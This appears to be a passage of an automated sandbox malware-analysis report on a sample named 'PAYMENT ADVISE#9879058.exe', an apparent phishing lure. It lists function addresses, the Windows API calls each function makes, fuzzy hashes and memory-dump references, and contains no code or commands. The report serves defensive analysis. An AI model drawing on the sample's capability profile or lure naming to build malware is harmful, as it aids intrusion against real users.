                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                          • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                          • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                          • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                          Function 0045552E Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                          Download Yara Rule
                          APIs
                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DestroyWindow$DeleteObject$IconMove
                          • String ID:
                          • API String ID: 1640429340-0
                          • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                          • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                          • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                          • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                          Function 00467E5E Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __fileno__setmode$DebugOutputString_fprintf
                          • String ID:
                          • API String ID: 3354276064-0
                          • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                          • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                          • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                          • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                          Function 00455080 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Destroy$DeleteMenuObject$IconWindow
                          • String ID:
                          • API String ID: 752480666-0
                          • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                          • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                          • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                          • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                          Function 00455212 Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                          Download Yara Rule
                          APIs
                          • DestroyWindow.USER32(00000000), ref: 0045527A
                          • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                          • String ID:
                          • API String ID: 3275902921-0
                          • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                          • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                          • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                          • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                          Function 00439326 Relevance: 9.1, APIs: 6, Instructions: 72processCOMMON
                          Download Yara Rule
                          APIs
                          • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                          • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                          • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                          • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                          • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                          • String ID:
                          • API String ID: 1413079979-0
                          • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                          • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                          • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                          • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                          Function 0041415E Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMON
                          Download Yara Rule
                          APIs
                          • ___set_flsgetvalue.LIBCMT ref: 0041418F
                          • __calloc_crt.LIBCMT ref: 0041419B
                          • __getptd.LIBCMT ref: 004141A8
                          • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                          • __dosmaperr.LIBCMT ref: 00414201
                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                          • String ID:
                          • API String ID: 1803633139-0
                          • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                          • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                          • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                          • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                          Function 004555E0 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                          Download Yara Rule
                          APIs
                          • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                          • String ID:
                          • API String ID: 3275902921-0
                          • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                          • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                          • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                          • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                          Function 004554C0 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageW.USER32 ref: 004554DF
                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                          • DeleteObject.GDI32(?), ref: 0045564E
                          • DeleteObject.GDI32(?), ref: 0045565C
                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                          • String ID:
                          • API String ID: 3691411573-0
                          • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                          • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                          • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                          • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                          Function 0043609C Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcslen$_wcstok$ExtentPoint32Text
                          • String ID:
                          • API String ID: 1814673581-0
                          • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                          • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                          • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                          • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                          Function 00436272 Relevance: 9.1, APIs: 6, Instructions: 59sleepCOMMON
                          Download Yara Rule
                          APIs
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                          • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                          • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                          • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                          Function 004471EC Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                            • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                            • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                            • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                          • LineTo.GDI32(?,?,?), ref: 00447227
                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                          • LineTo.GDI32(?,?,?), ref: 0044723D
                          • EndPath.GDI32(?), ref: 0044724E
                          • StrokePath.GDI32(?), ref: 0044725C
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                          • String ID:
                          • API String ID: 372113273-0
                          • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                          • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                          • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                          • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                          Function 00410940 Relevance: 9.0, APIs: 6, Instructions: 49keyboardCOMMON
                          Download Yara Rule
                          APIs
                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Virtual
                          • String ID:
                          • API String ID: 4278518827-0
                          • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                          • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                          • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                          • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                          Function 0044CBD3 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                          Download Yara Rule
                          APIs
                          • GetDC.USER32(00000000), ref: 0044CBEF
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CapsDevice$Release
                          • String ID:
                          • API String ID: 1035833867-0
                          • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                          • Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
                          • Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
                          • Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
                          Function 0044B64F Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                          Download Yara Rule
                          APIs
                          • InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
                          • EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
                          • TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
                          • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
                            • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
                          • InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
                          • LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                          • String ID:
                          • API String ID: 3495660284-0
                          • Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                          • Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
                          • Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
                          • Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
                          Function 00437118 Relevance: 9.0, APIs: 6, Instructions: 37windowtimethreadCOMMON
                          Download Yara Rule
                          APIs
                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
                          • GetWindowThreadProcessId.USER32(?,?), ref: 00437150
                          • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
                          • CloseHandle.KERNEL32(00000000), ref: 00437174
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                          • String ID:
                          • API String ID: 839392675-0
                          • Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                          • Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
                          • Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
                          • Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                          Function 0043604B Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                          Download Yara Rule
                          APIs
                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\PAYMENT ADVISE#9879058.exe,00000004), ref: 00436055
                          • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                          • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                          • GetLastError.KERNEL32 ref: 00436081
                          • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                          Memory Dump Source
